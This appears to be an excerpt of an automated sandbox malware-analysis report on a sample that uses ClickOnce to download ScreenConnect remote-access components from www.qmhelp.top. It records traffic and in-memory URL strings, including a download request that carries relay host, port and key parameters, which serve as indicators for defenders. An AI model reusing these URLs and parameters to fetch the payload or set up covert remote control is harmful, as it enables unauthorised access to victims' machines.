                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i= HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: www.qmhelp.top
                  Source: global trafficDNS traffic detected: DNS query: miledin.mwhelp.site
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, 00000000.00000002.1912261588.000000000083B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRoot
                  Source: F2E248BEDDBB2D85122423C41028BFD40.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, 00000000.00000002.1912261588.000000000083B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampi3)
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, 00000000.00000002.1912261588.000000000083B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D987D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D97F0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D98BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabs
                  Source: dfsvc.exe, 00000001.00000002.3055864006.000001D2D9943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.c
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D9860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.3051108557.000001D2D7578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BEE3A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871815455.000000000290A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871815455.0000000002BFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF29A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF225000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF136000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF15F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BEEAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BEEAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: dfsvc.exe, 00000001.00000002.3052659483.000001D2D8E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF367000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BEE3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top
                  Source: dfsvc.exe, 00000001.00000002.3055864006.000001D2D9943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/B
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.C
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1870575148.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871815455.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1874762837.000000001B1A2000.00000004.00000020.00020000.00000000.sdmp, RB87D1Y8.log.1.drString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
                  Source: dfsvc.exe, 00000001.00000002.3055864006.000001D2D9943000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3054816957.000001D2D98E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application%
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1874590511.000000001B169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application7a5c561934e089
                  Source: RB87D1Y8.log.1.drString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=miledin.mwhelp.site&
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D97F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applicationETEY.OE4z
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D984A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applicationN
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1874590511.000000001B169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application_4?
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D97F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.application_Y.OE4
                  Source: dfsvc.exe, 00000001.00000002.3054213457.000001D2D92F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applicationonx
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D987D000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3054816957.000001D2D97F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applications
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D97F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applications_
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1874590511.000000001B169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.applications_0I
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D987D000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF019000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.dll
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF15F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871815455.000000000286A000.00000004.00000800.00020000.00000000.sdmp, RB87D1Y8.log.1.drString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.3051108557.000001D2D75B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Client.manifestV
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF367000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.ClientSer
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.3055864006.000001D2D9943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.Windows.dll6
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsBackstageS
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF44A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF44A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF367000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3051108557.000001D2D750F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3042364344.000001D2BD300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configBc
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeX
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D987D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exen
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsCl
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF44A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D987D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsClient.exe.configd
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D987D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsClient.exe.configr
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsFileManager.ex8
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF44A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF367000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3051108557.000001D2D7578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF44A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D987D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qmhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configa
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63076
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63077 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63075
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63075 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
